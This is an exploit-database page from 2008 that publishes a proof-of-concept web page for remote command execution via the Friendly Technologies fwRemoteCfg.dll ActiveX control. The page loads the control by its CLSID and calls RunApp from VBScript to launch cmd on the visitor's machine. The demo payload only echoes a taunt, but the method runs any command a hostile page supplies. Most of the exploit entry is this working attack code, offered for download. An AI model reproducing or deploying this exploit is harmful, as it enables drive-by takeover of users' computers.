r00tsecurity -> Exploit & Advisory Center :: Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

LOGGED IN AS Viz0n [ Profile | Myr00t | Logout ]

Resource Database Index -> Exploits & Advisories -> Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Description // Info

<!--
In addition to the overflow found in the \"Friendly Technologies\" dialers ActiveX,
Here is a \"remote command execution\" exploit.
Its so sad people dont actually Think...

Exploit // Proof of Concept

<html>
<object classid=\'clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B\' id=\'lamers\' ></object>
<script language=\'vbscript\'>

lamers.RunApp \"cmd\" ,\"cmd /k echo So Simple, So Lame -- Somebody should get fired.\" ,0 

</script>

Comments

You must be logged in to post comments.

Exploit Information

Type:
Remote - Application/Service

Vendor:
Freindly Technologies

Product:
ActiveX Command

Versions Effected:

Submitted:
2008-09-02 - 18:59:54

Author:
spdr
E-Mail
Website

Greetz:
Binaryvision

[ Download | Report Issue ]

Exploit Search

Search by Type
+ Remote
+ Local
+ Application/Service
+ Web Application
+ Kernel
+ Operating System
+ Bug
+ Overflow
+ Shellcode
+ DOS
+ Advisory

Advanced Search